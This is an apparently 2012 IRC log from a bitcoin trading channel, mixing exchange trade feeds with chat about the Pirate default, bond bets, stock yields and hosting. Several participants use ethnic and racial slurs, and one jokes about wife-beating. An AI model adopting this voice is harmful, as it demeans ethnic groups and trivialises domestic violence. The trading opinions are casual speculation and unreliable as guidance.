10:42:28 [MPEX] [S.MPOE] 6200 @ 0.00038949 = 2.4148 BTC [-] Aug 23 10:43:11 [MPEX] [S.MPOE] 23568 @ 0.00039308 = 9.2641 BTC [+] Aug 23 10:44:08 ;;ticker Aug 23 10:44:09 Best bid: 9.8, Best ask: 9.85, Bid-ask spread: 0.05000, Last trade: 9.8, 24 hour volume: 56712, 24 hour low: 9.5714, 24 hour high: 10.09999 Aug 23 10:44:15 lmao bitcoin is so tame now. Aug 23 10:44:26 like this unruly wife that got a good beating. Aug 23 10:46:53 pirate bonds seem to be doing better, any word on pirate? iv been away Aug 23 10:47:21 not so far. Aug 23 10:47:42 hmm Aug 23 10:47:49 why the new faith in bonds then? Aug 23 10:49:35 [GLBSE] [GIGAMINING] 1 @ 0.9874 BTC [-] Aug 23 10:50:27 owners are prolly buying them in the deluded hope that pirate might still pay. Aug 23 10:51:25 [GLBSE] [BITBOND] 1 @ 0.46 BTC [-] Aug 23 10:53:28 [GLBSE] [BDT] 1 @ 1.025 BTC [-] Aug 23 10:55:30 Didn't you yourself bought most ot TYGRR.BOND-P back? Aug 23 10:56:57 [GLBSE] [YABMC] 1 @ 0.1297 BTC [+] Aug 23 10:57:21 [MPEX] [S.MPOE] 14132 @ 0.00039359 = 5.5622 BTC [+] Aug 23 10:58:18 [GLBSE] [UDN] 20 @ 0.1 = 2 BTC [-] Aug 23 10:59:21 [GLBSE] [FPGAMINING] 1 @ 0.9299 BTC [+] Aug 23 10:59:41 [GLBSE] [OBSI.HRPT] 45 @ 0.10495 = 4.7228 BTC [+] Aug 23 10:59:44 [GLBSE] [THUNDERCM.MIF.SHARES] 5 @ 0.4377 = 2.1885 BTC [-] Aug 23 10:59:46 [GLBSE] [THUNDERCM.MIF.SHARES] 4 @ 0.4377 = 1.7508 BTC [-] Aug 23 11:01:50 http://www.youtube.com/watch?v=3X9LvC9WkkQ << have a good morning son. Aug 23 11:01:52 song* Aug 23 11:05:50 [GLBSE] [OBSI.HRPT] 1 @ 0.10495 BTC [+] Aug 23 11:07:23 Usage: QUERY [-nofocus] , opens up a new privmsg window to someone Aug 23 11:08:38 [GLBSE] [BTC-MINING] 1 @ 0.98999 BTC [+] Aug 23 11:12:58 [GLBSE] [ZETA-MINING] 2 @ 0.1799 = 0.3598 BTC [+] Aug 23 11:14:51 blockchain is nearly finished downloading Aug 23 11:14:57 I'm guessing another hour maybe Aug 23 11:15:02 im buying mircea Aug 23 11:15:21 i have bids in, sad they are not filled Aug 23 11:15:49 Chaang-Noi: It was me :( Aug 23 11:16:04 buying? :) Aug 23 11:16:05 My bot had a stop loss triggered Aug 23 11:16:20 someone was dumping down to 0.34 Aug 23 11:16:32 your bid was the only liquidity left on the bid side Aug 23 11:16:40 so the bot sold all my -P bonds Aug 23 11:16:58 you got 882 or something right? Aug 23 11:17:49 [GLBSE] [DMC] 20 @ 0.05 = 1 BTC [+] Aug 23 11:18:19 some people are set to lose or make a lot depending on whether pirate pays out Aug 23 11:19:22 I already lost my share when my bot dumped Aug 23 11:19:35 Chaang-Noi will make it back, if pirate pays out Aug 23 11:20:43 I suspect Chaang-Noi will be rolling in the BTC if pirate pays back Aug 23 11:20:47 damn, your bot did some fail Aug 23 11:20:53 biiiiig fucking gamble Aug 23 11:21:01 hmmm Aug 23 11:21:05 i will be doing okay, but not as much as id like... i was unable to get anything from pirate for a long time Aug 23 11:21:24 [MPEX] [S.MPOE] 27368 @ 0.00039268 = 10.7469 BTC [-] Aug 23 11:21:28 but yeah its a gamble Aug 23 11:22:03 ill be oaky either way Aug 23 11:22:10 im not betting the farm lol Aug 23 11:22:12 well, it was fail because the price recovered quickly Aug 23 11:22:31 yeah, i guess it would ahve been good if there was news on a pirate default Aug 23 11:22:33 but I was burned before by bonds where bid side disappeared, Aug 23 11:22:40 and I was unable to liquidate my position Aug 23 11:23:14 thats partly due to GLBSE BTC reserve issue Aug 23 11:23:19 leaving us very soon Aug 23 11:23:19 Well, even with a pirate default, I would have been much better off selling slowly Aug 23 11:23:33 nefario1: yup, I'm very happy about that new update Aug 23 11:23:47 MoneyIsDebt this is why real men don't stoploss :d Aug 23 11:23:58 it was a bot, not a real man ;) Aug 23 11:24:54 If pirate does pay back, I'll have lost 755 BTC on that glitch :( Aug 23 11:25:06 expensive lesson in trading Aug 23 11:25:50 OOOOOOOOwch Aug 23 11:26:16 i once blew 895k usd by trading the wrong asset. Aug 23 11:26:21 shit happens. Aug 23 11:26:36 it's true that it was manty years ago and i still remember it tho Aug 23 11:26:40 like it was yesterday Aug 23 11:27:09 ouch Aug 23 11:27:56 I always trade manually Aug 23 11:28:08 i tend to, since then. Aug 23 11:28:51 I did this because I figured if price falls that low, pirate default must have happened, so I'd better sell as quickly as possible Aug 23 11:29:06 I couldn't stay up 24 hrs a day, so... Aug 23 11:29:15 real men stay up 25 hours a day Aug 23 11:29:24 [GLBSE] [BDK.BND] 1 @ 0.101 BTC [-] Aug 23 11:29:26 hehe Aug 23 11:29:28 lol Aug 23 11:29:44 I feel more of a man now, having tried this Aug 23 11:29:45 speed Aug 23 11:30:03 plane is ready to go Aug 23 11:30:04 Hmm, not much Kraken being bought Aug 23 11:30:06 catch ya all later Aug 23 11:30:11 Chaang-Noi: see you Aug 23 11:30:25 but not in Thailand - I just blew my travel money Aug 23 11:30:26 I guess with BS&T, they're waiting to see how Patrick will be after clearing the PPT Aug 23 11:30:29 :/ Aug 23 11:30:39 [GLBSE] [JAH] 10 @ 0.18 = 1.8 BTC [+] Aug 23 11:30:49 I guess with BS&T, they're waiting to see how Patrick will be after clearing the PPT << ? Aug 23 11:30:50 What's Patrick's connection to BS&T Aug 23 11:30:56 yeah what??? Aug 23 11:31:30 He was running the PPT (with his insurance money) Aug 23 11:31:40 and had money in Pirate. Aug 23 11:31:41 [GLBSE] [JLP-BMD] 1 @ 0.0999 BTC [-] Aug 23 11:31:42 okay ill get that later Aug 23 11:31:46 peace byeb ye japan Aug 23 11:31:53 yeah he'll be hit hard Aug 23 11:32:05 If pirate doesn't pay... Aug 23 11:32:09 or do well if he does Aug 23 11:32:45 BTC-MINING i thought he's one of the less exposed of the forum wanna-be bankers Aug 23 11:33:00 [GLBSE] [PIMP] 4 @ 0.17 = 0.68 BTC [+] Aug 23 11:33:52 used to be before he bought PPT Aug 23 11:33:56 or took it over Aug 23 11:34:04 not sure what the deal in the background there was Aug 23 11:34:22 [GLBSE] [BFLS] 1 @ 1.18999 BTC [+] Aug 23 11:34:28 when was this ? Aug 23 11:34:35 a couple of weeks ago Aug 23 11:34:42 eh ? Aug 23 11:34:50 Well he does have a lot of funds in Pirate, he still has a lot of capital outside it tho. Aug 23 11:35:05 he'd better. Aug 23 11:35:07 [GLBSE] [BMMO] 1 @ 0.1 BTC [-] Aug 23 11:35:10 But he might have to review his rate on Kraken or reduce the max amount he can take charge off. Aug 23 11:35:23 charge of* Aug 23 11:35:53 the citizen-finance troop should get a smarting lesson, but i'd rather not see the thing completely extinguished Aug 23 11:36:08 evolution needs survivors to work. Aug 23 11:37:08 [GLBSE] [BMMO] 3 @ 0.1099 = 0.3297 BTC [+] Aug 23 11:38:15 How many businesses out there make money outside of lending and mining? Aug 23 11:39:00 MoneyIsDebt two. Aug 23 11:39:06 [GLBSE] [BITNODES] 1 @ 0.258 BTC [-] Aug 23 11:39:36 [MPEX] [F.GIGA.ETF] 100 @ 0.0010114 = 0.1011 BTC [+] Aug 23 11:39:45 bitvps and mpoe? Aug 23 11:39:51 mpoe and sdice Aug 23 11:39:57 and yes, you're right, tghree. Aug 23 11:40:04 rg will go all donald duck on me nao. Aug 23 11:40:30 sdice is a bit fishy to me Aug 23 11:40:37 the site is already up and running Aug 23 11:40:44 so what do all those shares represent Aug 23 11:40:49 what is the capital for Aug 23 11:41:19 it's an established business. you get shares of its future revenue Aug 23 11:41:25 Owner want to cash in now on future revenues I guess Aug 23 11:41:41 damn are we still on pirate? Aug 23 11:41:45 no, we moved on. Aug 23 11:41:58 MoneyIsDebt i frankly do not trust this model whereby people with an ideea are given btc to make it. Aug 23 11:42:01 i want to see it made first. Aug 23 11:42:20 might be just me, but "ideeas" + "over the internet" + btc = disaster. Aug 23 11:42:21 im with mircea Aug 23 11:42:36 when bitvps started an asset we already had a bunchof customers+servers Aug 23 11:42:40 there's a good reason angels/start-up geared VCs insist things they finance move in their town. Aug 23 11:44:53 eheheh Aug 23 11:45:01 so what's the current yield on these three stocks? Aug 23 11:45:36 very low for SDice and MPOE Aug 23 11:45:36 [GLBSE] [SILVER] 12 @ 0.01 = 0.12 BTC [+] Aug 23 11:45:45 but stable/good long term I guess Aug 23 11:45:54 Something like ~10% a year I think Aug 23 11:46:23 I pay 0.5% per week, that's 26% per year, for loans. Aug 23 11:46:48 s.dice shows about 10%, s.mpoe about 5% atm, s.bvps is doing prolly like 8% i think ? Aug 23 11:46:51 [MPEX] [S.MPOE] 10800 @ 0.0003941 = 4.2563 BTC [+] Aug 23 11:46:59 !ticker s.bvps Aug 23 11:47:00 [MPEX:S.BVPS] 1day: 0.00342545 / 0.00353316 / 0.00355158 (548 shares, 1.94 BTC), 30day: 0.001175 / 0.00314956 / 0.00435 (87247 shares, 274.79 BTC) Aug 23 11:47:13 For more traditional businesses, not a bad yearly rate. Aug 23 11:47:14 .py 40*12 / 0.00353316 / 1000000 Aug 23 11:47:15 0.135855721224 Aug 23 11:47:18 13% even. Aug 23 11:47:28 rg how come you make so much ? Aug 23 11:47:29 But the fact they all depend on Bitcoins makes the rate a bit low in my opinion Aug 23 11:47:33 woot Aug 23 11:47:35 cheap shares Aug 23 11:47:37 ALL FOAR RG Aug 23 11:47:42 lol Aug 23 11:48:47 FUCK YOU CHINA AND YOUR SHITTY INTERNET TO THE REST OF CIVILIZATION!!!! Aug 23 11:49:12 CANT EVEN USE A TERMINAL THE LAG IS SO GREAT!!!! FUUUUUUUUUUUUUUUUUUUU.......... Aug 23 11:49:13 hi you have ben repolted kokoko Aug 23 11:49:18 [MPEX] [S.MPOE] 13600 @ 0.0003933 = 5.3489 BTC [-] Aug 23 11:49:38 hah, terminal... Aug 23 11:49:47 nefalio sez: bad china gleat dishonlol. Aug 23 11:49:57 when i was young we'd haul punched cards in a plastic bag on the bus Aug 23 11:50:14 So, I made a bet against pirate. If pirate pays, I lose big time. Aug 23 11:50:20 hehe Aug 23 11:50:23 hes gonna pay Aug 23 11:50:27 BTC-MINING what's your definition of big time ? Aug 23 11:50:38 rg yes, on an infinite timescale he is eventually going to pay. Aug 23 11:51:03 With his life? ... (dying of old age) Aug 23 11:51:09 I think he'll pay if btc price falls to $5 usd Aug 23 11:51:12 Well, not that big. 250 BTC. Aug 23 11:51:21 250 btc Aug 23 11:51:24 big enough Aug 23 11:51:28 but when he said he'd dump 200k on irc, gox didn't even react Aug 23 11:51:29 that's the total amount of btc in the bitvps awlle Aug 23 11:51:33 wallet Aug 23 11:51:35 so Aug 23 11:51:37 that's a lot Aug 23 11:51:47 Meh, a good chunk of my worth Aug 23 11:51:53 problem is, people can't panic sell, cause all their bitcoins are in bts&t already Aug 23 11:51:53 About 1/6th Aug 23 11:52:00 cancel it bro Aug 23 11:52:09 just give it to me to play on satshidice Aug 23 11:52:09 :) Aug 23 11:52:13 Nah, can't and don't want to. Aug 23 11:52:47 this lean cuisine is nasty Aug 23 11:52:54 i dont know why i even stole it from my room mate Aug 23 11:52:57 i coulda just had cereal Aug 23 11:53:06 BTC-MINING it is a decent bet. some people have bets of 5k Aug 23 11:53:25 If pirate pays, I expect the news of a real 7% weekly investment would flock investors to bitcoins even more, raising my portfolio value. Aug 23 11:53:37 If he doesn't, like I think, I get free money Aug 23 11:54:05 If he pays Aug 23 11:54:12 every pool with money will be in bitcoin Aug 23 11:54:20 and scams will flourish Aug 23 11:54:29 s/pool/fool Aug 23 11:54:42 eh... might be true... Aug 23 11:56:27 If it goes like rollercoaster with news of paying/scams/paying/scams... guess we'll keep our funds on MtGox Aug 23 11:56:31 ya, him paying would be bad for btc i suspect. Aug 23 11:56:49 And have to trade the market Aug 23 11:57:17 i hope glbse gets a piece Aug 23 11:57:24 thatd be good for everyone Aug 23 12:00:04 I'm thinking of launching a fund on GLBSE with the sole purpose of funding tech startups Aug 23 12:00:08 think ycombinator of bitcoin Aug 23 12:00:12 the idea being Aug 23 12:00:27 to stop all these new assets being created for vaporware Aug 23 12:00:35 Seeing all the new features coming up, I guess nefario knows where the money is and where work should go to. Aug 23 12:00:42 nefario1 if you have the time to babysit noobs that would be a valuable service to all. Aug 23 12:00:48 too bad nefario is such a lazyass Aug 23 12:00:57 rg? Aug 23 12:01:03 YOU ARE A LAZY ASS Aug 23 12:01:05 Have you seen the new features coming up O.o Aug 23 12:01:15 and you're in china Aug 23 12:01:18 that's not good for anyone Aug 23 12:01:19 rg, I'm not lazy Aug 23 12:01:23 I'm just busy Aug 23 12:01:27 busy lazu Aug 23 12:01:29 whatever Aug 23 12:01:38 Im in China NAO! Aug 23 12:01:40 you need to give your life to glbse Aug 23 12:01:41 end of the month Aug 23 12:01:44 LONDFON Aug 23 12:01:45 if you want it to succeed Aug 23 12:01:51 the evil twin city of london Aug 23 12:02:00 im looking at 'flats' in lewisham Aug 23 12:02:15 I got a room 15min walk from london bridge Aug 23 12:02:25 a 'room' ? Aug 23 12:02:34 ja a "room" Aug 23 12:02:39 [GLBSE] [OBSI.HRPT] 1 @ 0.10495 BTC [+] Aug 23 12:02:39 is london bridge the same as tower bridge Aug 23 12:02:44 no.. its not is it? Aug 23 12:02:52 no? Aug 23 12:02:54 meh Aug 23 12:03:02 tower bridge is where my office is Aug 23 12:03:03 well Aug 23 12:03:03 near it Aug 23 12:03:43 if I put either london bridge or tower birdge into google images Aug 23 12:03:46 I get the same pic Aug 23 12:03:54 tower bridge is this huge ass thing Aug 23 12:03:57 at 5 theres like Aug 23 12:04:00 30,000 people walking across it Aug 23 12:04:09 look on a map Aug 23 12:04:12 for traveledge Aug 23 12:04:13 er Aug 23 12:04:18 travelodge tower bridge Aug 23 12:04:29 http://en.wikipedia.org/wiki/London_Bridge Aug 23 12:04:35 http://en.wikipedia.org/wiki/Tower_Bridge Aug 23 12:04:38 I see it Aug 23 12:04:43 hmm Aug 23 12:04:45 not the same Aug 23 12:04:47 meh Aug 23 12:04:51 both are near each other Aug 23 12:04:55 London Tower Bridge - 0.2 miles View map Aug 23 12:04:55 London Tower Hill - 0.2 miles View map Aug 23 12:05:24 they're near cause london used to be this crammed up slum Aug 23 12:05:30 for all of its history including the present day. Aug 23 12:05:37 London is awesome Aug 23 12:05:41 you can take the train anywhere Aug 23 12:05:42 ja Aug 23 12:05:47 it is awesome Aug 23 12:05:47 it's a nice place IMO Aug 23 12:05:48 even the far away Aug 23 12:05:53 but its still a crammed up slum Aug 23 12:05:53 like London is massive Aug 23 12:05:58 Im on the underground during rush hour Aug 23 12:06:01 and Im like Aug 23 12:06:04 people who lived their entire life in cali end up with claustrofobia in london Aug 23 12:06:05 woah! Aug 23 12:06:05 this is sooo empty Aug 23 12:06:14 mircea Aug 23 12:06:17 that's why the apt im looking at Aug 23 12:06:19 has a backyard Aug 23 12:06:21 comforts of home Aug 23 12:06:22 in comparison to buses here Aug 23 12:06:22 aha Aug 23 12:06:44 http://www.rightmove.co.uk/property-to-rent/property-34244341.html Aug 23 12:06:46 i have a ~5k sq foot yard, locals go "why is it so tiny ?!?!" Aug 23 12:06:46 that's it Aug 23 12:06:53 ok final testing before the update is rtolled out Aug 23 12:06:54 im like fuck you bitch, you mow the lawn. Aug 23 12:06:55 i doubt it will be available once i finally move Aug 23 12:06:59 but its nicce Aug 23 12:08:19 rg decent, esp for london Aug 23 12:08:33 900gbp all inclued Aug 23 12:08:37 its got a garden, a backyard Aug 23 12:08:40 an upstairs Aug 23 12:08:43 dish washer, etc Aug 23 12:08:48 its better htan my current apt Aug 23 12:08:48 lol Aug 23 12:08:53 expensive as all fuck Aug 23 12:09:08 thats because it's nice Aug 23 12:09:10 in a nice place Aug 23 12:09:11 900gbp all inclusive Aug 23 12:09:15 that's .. not that bad Aug 23 12:09:15 where other people want to also be Aug 23 12:09:21 and its *right* near a train Aug 23 12:09:25 that goes directly to work Aug 23 12:09:35 i dont even need to switch trains Aug 23 12:09:40 that, my friend, is worth it Aug 23 12:09:50 i pay 22k a year for 5k sq ft yard + 3k foot house, two floors. Aug 23 12:10:01 yeah and you live in a third world country Aug 23 12:10:03 .g 22000 ron to usd Aug 23 12:10:04 mircea_popescu: http://coinmill.com/RON_calculator.html Aug 23 12:10:05 im talking about england Aug 23 12:10:17 the pride of europe Aug 23 12:10:19 hey, there's more white peopkle on my street than on yours rg. Aug 23 12:10:21 wanna bet ? Aug 23 12:10:24 pride of pakistan. Aug 23 12:10:53 thats bradford or luton Aug 23 12:10:56 both shitty places Aug 23 12:11:03 not london Aug 23 12:11:15 i had somewhere this hysterical story btw Aug 23 12:11:19 lemme see if i can still find it Aug 23 12:11:22 and do you still call them white if they're brown from dirt? Aug 23 12:11:39 http://www.dailymail.co.uk/news/article-2026723/Gypsies-immigration-officers-home-Proms.html Aug 23 12:12:15 Leytonstone aaaite ? Aug 23 12:13:04 lol Aug 23 12:14:05 [05:09] hey, there's more white peopkle on my street than on yours rg. Aug 23 12:14:07 hahah Aug 23 12:14:37 The racial makeup of the town was 97.5% White, 0.57% African American 0.10% Native American, 0.96% Asian, 0.02% Pacific Islander, 0.16% from other races, and 0.67% from two or more races. Hispanic or Latino of any race were 0.84% of the population Aug 23 12:15:04 that's from like 1982 Aug 23 12:15:05 [GLBSE] [CHEAPERINBITCOINS-STOCKS] 1 @ 0.28999 BTC [+] Aug 23 12:15:10 nope Aug 23 12:15:29 dude there's no way, you saw london recently ?! Aug 23 12:15:45 no asshole Aug 23 12:15:46 that's my tow Aug 23 12:15:48 n Aug 23 12:17:36 o, i didn't mean bumfuck mormonland Aug 23 12:17:39 i meant where you're moving. Aug 23 12:19:09 [MPEX] [F.GIGA.ETF] 4846 @ 0.0010219 = 4.9521 BTC [+] Aug 23 12:21:51 [MPEX] [S.MPOE] 6232 @ 0.0003933 = 2.451 BTC [-] Aug 23 12:21:52 [MPEX] [S.MPOE] 568 @ 0.00039108 = 0.2221 BTC [-] Aug 23 12:25:18 [GLBSE] [OBSI.HRPT] 4 @ 0.10495 = 0.4198 BTC [+] Aug 23 12:26:16 [MPEX] [S.BVPS] 50 @ 0.0033617 = 0.1681 BTC [-] Aug 23 12:26:52 [MPEX] [S.BVPS] 370 @ 0.0034226 = 1.2664 BTC [+] Aug 23 12:26:58 [GLBSE] [NYAN.B] 1 @ 0.99999999 BTC [+] Aug 23 12:27:16 [MPEX] [S.BVPS] 32 @ 0.00345941 = 0.1107 BTC [+] Aug 23 12:27:23 [GLBSE] [OBSI.HRPT] 9 @ 0.10495 = 0.9446 BTC [+] Aug 23 12:27:40 [MPEX] [S.BVPS] 450 @ 0.00357227 = 1.6075 BTC [+] Aug 23 12:30:43 dont let the door hit your ass on the way out Aug 23 12:30:46 cheap bitvps sellers Aug 23 12:32:23 [MPEX] [F.GIGA.ETF] 5100 @ 0.00102732 = 5.2393 BTC [+] Aug 23 12:32:25 [MPEX] [F.GIGA.ETF] 4100 @ 0.00103573 = 4.2465 BTC [+] Aug 23 12:33:27 0. Aug 23 12:33:47 i bet everyone's dumping you to go into erik's, rg. Aug 23 12:34:01 dropping their whole 2 btc Aug 23 12:34:02 ;) Aug 23 12:34:31 well it got bought right back huh Aug 23 12:34:43 yeah Aug 23 12:34:44 fuck em Aug 23 12:34:46 ill buy it all back Aug 23 12:34:49 moar profit for u Aug 23 12:34:50 s Aug 23 12:34:59 o you did ? good for you. Aug 23 12:35:14 anything less than 0037 Aug 23 12:35:17 i will buy back Aug 23 12:35:48 http://www.youtube.com/watch?v=4Diu2N8TGKA Aug 23 12:36:41 [GLBSE] [BITBOND] 6 @ 0.4581 = 2.7486 BTC [-] Aug 23 12:37:12 [MPEX] [F.GIGA.ETF] 1200 @ 0.00103573 = 1.2429 BTC [+] Aug 23 12:38:04 [GLBSE] [MOORE] 24 @ 0.5 = 12 BTC [-] Aug 23 12:38:06 [GLBSE] [MOORE] 25 @ 0.5 = 12.5 BTC [-] Aug 23 12:45:10 [MPEX] [F.GIGA.ETF] 8298 @ 0.00103573 = 8.5945 BTC [+] Aug 23 12:45:12 [MPEX] [F.GIGA.ETF] 510 @ 0.00103599 = 0.5284 BTC [+] Aug 23 12:45:13 [MPEX] [F.GIGA.ETF] 4000 @ 0.00103833 = 4.1533 BTC [+] Aug 23 12:45:14 [MPEX] [F.GIGA.ETF] 4192 @ 0.00103955 = 4.3578 BTC [+] Aug 23 12:45:20 !ticker MOORE Aug 23 12:45:24 Invalid ticker. Aug 23 12:45:28 !ticker MOORE Aug 23 12:45:29 [GLBSE:MOORE] [Bid: 0.42] [Ask: 0.5139] [Spread: 0.0939] [Last: 0.5] [24hVol: 34.50000001] [7dAvg: 0.50798992] Aug 23 12:50:52 what's moore ? Aug 23 12:58:07 no idea Aug 23 12:58:08 tbh Aug 23 12:58:30 MOORE is a perpetual mining bond, each share of the bond has 1MH/s of hashrate from the start, but grows by 0.89% compounded each week. Aug 23 12:58:32 what a surprise Aug 23 12:58:34 useless shit Aug 23 12:59:09 yeah, a rut was starting to develop. Aug 23 13:01:12 mk so mpoe.org, mpoe.biz, mpex.us, mpex.biz now point to http://polimedia.us/bitcoin/mpex.php Aug 23 13:01:23 maybe now people can stfu about domain names. Aug 23 13:02:49 http://www.theregister.co.uk/2012/08/22/oceanic_uranium_mining_tech/ Aug 23 13:02:52 ^^ amazing Aug 23 13:03:08 pretty cool actually! Aug 23 13:03:18 jesus what'd you do Aug 23 13:03:23 go to bargain-bin-tlds.com Aug 23 13:03:24 ? Aug 23 13:03:36 you shoulda got mpoe.com.pk Aug 23 13:04:29 com.pk ?! Aug 23 13:04:41 the fuck is com.pk Aug 23 13:04:47 commercial Aug 23 13:04:48 pakistan Aug 23 13:04:51 ahaha Aug 23 13:04:58 ill move bvps there. Aug 23 13:05:03 1sec Aug 23 13:05:14 i would love a paki server Aug 23 13:05:15 but Aug 23 13:05:23 there isn't one ? Aug 23 13:05:25 their rebels are always blowing up the fiber Aug 23 13:05:29 lol Aug 23 13:05:30 so the inet is unstable Aug 23 13:05:44 actually a paki server could be pretty cool Aug 23 13:05:53 i haven't run a pentium i for over a decade. Aug 23 13:06:17 be like "our datacenter uses all recycled parts. literally, we scour the dumps weekly for new parts" Aug 23 13:10:45 [GLBSE] [ASICMINER] 3 @ 0.0987 = 0.2961 BTC [+] Aug 23 13:14:09 haha Aug 23 13:14:19 ive wanted an asian server Aug 23 13:14:20 fr ages Aug 23 13:14:27 our switzerland node Aug 23 13:14:30 popular as FUCK Aug 23 13:14:40 an asian node would be even mroe popular Aug 23 13:14:46 if we got it in the proper country Aug 23 13:14:51 obviously not china Aug 23 13:15:15 hrm Aug 23 13:15:21 i cant get this trading algorithm Aug 23 13:15:23 to work Aug 23 13:15:24 in bash Aug 23 13:16:06 oo Aug 23 13:16:09 tomorrow Satoshi goes live Aug 23 13:16:10 right? Aug 23 13:16:36 [GLBSE] [KRAKEN] 9 @ 0.01 = 0.09 BTC Aug 23 13:16:40 this excites me!! Aug 23 13:16:49 more companies will probably come to mpe Aug 23 13:16:50 x Aug 23 13:17:43 BITCO.IN Aug 23 13:17:49 i bet whoever owns that could sell it Aug 23 13:17:51 for like 300 btc Aug 23 13:33:02 rg tomorrow midnight gmt Aug 23 13:33:06 in like 36 hours Aug 23 13:33:16 wat goes live? Aug 23 13:33:20 s.dice Aug 23 13:34:29 What's the Ipo price per share? Aug 23 13:34:42 .003xxx Aug 23 13:34:44 i think Aug 23 13:34:53 http://polimedia.us/bitcoin/mpex.php?mpsic=S.DICE whole story is there Aug 23 13:35:05 mircea what do you think Aug 23 13:35:13 should i let those chinks have bitvps.cn Aug 23 13:36:01 im pretty sure it is spam. Aug 23 13:39:42 rg: lolwat Aug 23 13:39:42 damn Aug 23 13:39:46 bitvps has a ton of bills coming up Aug 23 13:39:50 Diablo-D3 just some stupid spam Aug 23 13:39:54 to try and get me to buy bitvps.cn Aug 23 13:40:03 from a dodgy registrar Aug 23 13:40:18 they send you an email saying that chinks are registering your domain in .cn/.asia Aug 23 13:40:27 and if you want, you can buy it first cause you own the trade mark Aug 23 13:40:36 according to chinese law Aug 23 13:40:40 (which i just looked up and is bullshit) Aug 23 13:44:42 yeah, because according to US law, if you own the trademark you can just take the domain Aug 23 13:44:53 and since the internet belongs to the US, and all top level domains are US property Aug 23 13:44:55 bam. Aug 23 13:46:25 dub: if you don't feel like paying 20BTC to open an account for the IPO you can get the pass throughs on GLBSE Aug 23 13:48:00 hrm Aug 23 13:48:05 satoshidice hasnt send me my earnings Aug 23 13:48:10 the site said it did, and its confirmed Aug 23 13:48:44 oh i see why Aug 23 13:48:45 hrm Aug 23 13:49:41 oh god Aug 23 13:49:45 i just realized something awful Aug 23 13:49:47 what did you do now Aug 23 13:50:46 so Aug 23 13:50:53 SatoshiDice has been sending back my winnings Aug 23 13:50:56 to random addresses Aug 23 13:51:03 our billing system uses those addresses Aug 23 13:51:04 to match users Aug 23 13:51:09 so all our SD earnings Aug 23 13:51:12 have been marking users as paid Aug 23 13:51:14 when theyre not paid Aug 23 13:51:19 rg: HAHAHAHAHAHAHAHHAHA Aug 23 13:51:20 OH MAN Aug 23 13:51:22 luckily its an easy fix Aug 23 13:51:31 btw, yes, SD sends earnings to a random address Aug 23 13:51:40 it cant tell the difference between your address and a change address Aug 23 13:52:22 or wait Aug 23 13:52:24 i guess im wrong Aug 23 13:52:28 it didn't credit these users Aug 23 13:52:37 "account" : "320-812", Aug 23 13:52:37 "address" : "14bCG5K99EWoMTQPZJhPDNEXkYTUoK3Gkn", Aug 23 13:52:37 "category" : "receive", Aug 23 13:52:37 "amount" : 4.00719600, Aug 23 13:52:39 see Aug 23 13:52:45 userid 320, invoice 812 Aug 23 13:52:45 when was it pirate made the anouncement that he was closing down? Aug 23 13:53:29 nefario1: bout a week ago Aug 23 13:53:36 how do you make bitcoind show all transactions Aug 23 13:53:48 usually i do listtransactions "" 100 Aug 23 13:53:52 but these have an 'account' Aug 23 13:53:57 let me see if it will tae * Aug 23 13:53:59 take * Aug 23 13:54:10 ok it does Aug 23 13:54:10 woot Aug 23 13:56:35 hm Aug 23 13:56:36 ok Aug 23 13:56:38 i panicked for nothing Aug 23 13:56:43 it didn't credit any of theaccounts Aug 23 13:56:57 rg: okay so wait Aug 23 13:57:12 you played SD on the bitvps bitcoind address? Aug 23 13:57:18 yes Aug 23 13:57:48 i dont have a home bitcoind anymore Aug 23 13:57:50 it fucks with my system Aug 23 13:58:21 i dont take a check from bitvps anyway so all my money remains there Aug 23 13:58:36 i 're-invest' it Aug 23 13:58:38 into the company Aug 23 13:59:00 i leave *my* personal money in MPEX Aug 23 13:59:04 dont get any ideas mircea Aug 23 13:59:35 see cause MPEX used to give me interest Aug 23 13:59:35 -_-` Aug 23 13:59:38 so i used it like a bank account Aug 23 13:59:42 now i get nothing for leaving it there Aug 23 13:59:47 i just dont know where else to put it Aug 23 14:00:26 i leave it in there in the hopes that mircea figures out how to give interest Aug 23 14:00:31 properly Aug 23 14:00:47 i told him to decide rates based on length of deposit Aug 23 14:00:49 like a mining pool Aug 23 14:01:18 when people join a pool and it solves a block, they dont get the same payout Aug 23 14:01:27 they get it for the amount of shares they put in Aug 23 14:01:38 mpex should function the same way Aug 23 14:01:39 with interest Aug 23 14:02:31 i also left a torrent seeding Aug 23 14:02:32 fuck Aug 23 14:04:05 S.BVPS : S 10`000 @ 0.00482013BTC (order #1924974) Aug 23 14:04:10 lol i wonder if that will ever sell Aug 23 14:04:18 rg: okay so Aug 23 14:04:23 Im not going to sell enterprise dedis Aug 23 14:04:25 Im going to sell Aug 23 14:04:28 industrial dedis. Aug 23 14:04:32 woh Aug 23 14:04:34 woah Aug 23 14:04:37 that sounds WAY more important Aug 23 14:04:41 'industrial' Aug 23 14:04:48 (im not being sarcastic) Aug 23 14:04:57 hrmph Aug 23 14:05:00 why didn't i think of that Aug 23 14:05:03 [MPEX] [S.MPOE] 35800 @ 0.00039141 = 14.0125 BTC [+] Aug 23 14:05:05 [MPEX] [S.MPOE] 12500 @ 0.00039108 = 4.8885 BTC [-] Aug 23 14:05:07 http://www.hosting.com/ Aug 23 14:05:08 bam Aug 23 14:05:11 [GLBSE] [ASICMINER] 12 @ 0.0987 = 1.1844 BTC [+] Aug 23 14:05:13 [GLBSE] [ASICMINER] 28 @ 0.0988 = 2.7664 BTC [+] Aug 23 14:05:14 I stole the idea from them Aug 23 14:05:23 [GLBSE] [V.HRL] 1 @ 1 BTC Aug 23 14:05:28 INDUSTRIAL STRENGTH CLOUDS, NIGGAH Aug 23 14:05:34 it just sounds better Aug 23 14:05:37 its better than Enterprise Aug 23 14:05:44 niggah, foo Aug 23 14:05:59 cloud, niggah, foo..... Aug 23 14:06:08 holy fuck this turned into an ff7 joke Aug 23 14:07:14 im selling mercantile vps Aug 23 14:07:35 NO that's a shitty synonym Aug 23 14:07:36 fuck this site Aug 23 14:08:03 aw yea Aug 23 14:08:06 my clarkmoody ad does it again Aug 23 14:08:27 not gonna like Aug 23 14:08:32 this new customers name Aug 23 14:08:33 sounds like 'fart' Aug 23 14:09:05 [GLBSE] [ASICMINER] 10 @ 0.0988 = 0.988 BTC [+] Aug 23 14:10:34 [GLBSE] [TYGRR.BOND-P] 2 @ 0.6649 = 1.3298 BTC [+] Aug 23 14:10:34 [GLBSE] [TYGRR.BOND-P] 23 @ 0.665 = 15.295 BTC [+] Aug 23 14:11:03 indstrual Aug 23 14:11:05 industrial Aug 23 14:11:07 *grumble* Aug 23 14:11:09 